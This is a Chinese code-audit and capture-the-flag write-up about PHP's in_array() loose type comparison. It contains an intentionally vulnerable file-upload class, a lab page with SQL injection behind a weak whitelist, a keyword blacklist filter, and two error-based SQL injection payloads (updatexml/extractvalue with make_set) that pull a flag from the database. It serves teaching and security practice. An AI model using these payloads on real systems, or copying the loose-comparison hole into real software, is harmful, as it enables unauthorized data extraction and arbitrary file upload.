[代码审计Day1] in_array代码审计

 简介

1

 简介

 in_array()

函数搜索数组中是否存在指定的值。

语法:in_array(search,array,type)

参数	描述
search	必需。规定要在数组搜索的值。
array	必需。规定要搜索的数组。
type	可选。如果设置该参数为 true，则检查搜索的数据与数组的值的类型是否相同。

class Challenge {
//设置图片上传目录
  const UPLOAD_DIRECTORY = './solutions/';  
  
  private $file;
  private $whitelist;

 //当对创建时调用的函数
  public function __construct($file) {
     //将外部上传的图片内容信息赋值给$this->_file
    $this->file = $file;
    //设置1-24的值分别赋值给whitelist白名单 
    $this->whitelist = range(1, 24);
  }
//当对象销毁时使用
  public function __destruct() {
    //判断传进来的图片名称是否符合白名单里面的信息 
    //这段代码的主要漏洞就在这里in_array()判断不严格 没加true 此时判断是不会判断类型的
    //所以我们可以上传1-24数字开头的值即可绕过导致图片任意上传
    if (in_array($this->file['name'], $this->whitelist)) {
      move_uploaded_file(
        $this->file['tmp_name'],
        self::UPLOAD_DIRECTORY . $this->file['name']
      );
    }
  }
}
$challenge = new Challenge($_FILES['solution']);

 一个CTF例子

index.php

<?php
include 'config.php';
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("连接失败: ");
}

$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    $whitelist = range(1, $row['COUNT(*)']);
}

$id = stop_hack($_GET['id']);

// $id = $_GET['id'];
$sql = "SELECT * FROM users WHERE id=$id";

print_r($sql);
if (!in_array($id, $whitelist)) {
    die("id $id is not in whitelist.");
}

$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    echo "<center><table border='1'>";
    foreach ($row as $key => $value) {
        echo "<tr><td><center>$key</center></td><br>";
        echo "<td><center>$value</center></td></tr><br>";
    }
    echo "</table></center>";
}
else{
    die($conn->error);
}

?>

config.php

<?php  
$servername = "localhost";
$username = "root";
$password = "xiaohua";
$dbname = "day1";

function stop_hack($value){
    $pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|/*|*|../|./|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
    $back_list = explode("|",$pattern);
    foreach($back_list as $hack){
        if(preg_match("/$hack/i", $value))
            die("$hack detected!");
    }
    return $value;
}
?>

数据库

create database day1;
use day1;
create table users (
id int(6) unsigned auto_increment primary key,
name varchar(20) not null,
email varchar(30) not null,
salary int(8) unsigned not null );

INSERT INTO users VALUES(1,'Lucia','Lucia@hongri.com',3000);
INSERT INTO users VALUES(2,'Danny','Danny@hongri.com',4500);
INSERT INTO users VALUES(3,'Alina','Alina@hongri.com',2700);
INSERT INTO users VALUES(4,'Jameson','Jameson@hongri.com',10000);
INSERT INTO users VALUES(5,'Allie','Allie@hongri.com',6000);

create table flag(flag varchar(30) not null);
INSERT INTO flag VALUES('HRCTF{1n0rrY_i3_Vu1n3rab13}');

这道题目考察的是 in_array 绕过和不能使用拼接函数的 updatexml 注入这里 in_array 函数没有使用强匹配，所以是可以绕过的，例如： id=1' 是可以成功绕过 in_array 函数的。

stop_hack函数过滤了各种数据库操作指令 如数据库连接操作可以使用make_set()函数代替

最终payload:

http://localhost/index.php?id=4 and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))

payload2

http://127.0.0.1/hua01/index.php?id=1 and extractvalue(1,make_set(3,'~',select flag from flag))

 简介

1